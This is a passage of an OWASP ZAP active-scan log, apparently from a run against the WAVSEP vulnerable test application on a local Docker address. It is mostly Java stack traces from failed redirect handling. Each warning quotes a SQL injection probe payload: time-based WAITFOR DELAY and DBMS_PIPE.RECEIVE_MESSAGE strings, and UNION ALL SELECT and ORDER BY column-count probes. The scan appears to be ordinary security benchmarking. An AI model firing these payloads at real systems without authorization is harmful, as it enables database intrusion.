org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682164 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND ('RoiE'='RoiE] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND ('RoiE'='RoiE at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682165 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682166 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND 'dHip'='dHip] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND 'dHip'='dHip at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682167 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682168 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682168 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- Zlgg] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- Zlgg at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682169 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682170 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682171 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND 2592=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(114)||CHR(101)||CHR(107),5) AND (2205=2205] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) AND 2592=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(114)||CHR(101)||CHR(107),5) AND (2205=2205 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682172 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682172 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 7248=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(114)||CHR(67)||CHR(116),5)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 7248=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(114)||CHR(67)||CHR(116),5) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682174 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: 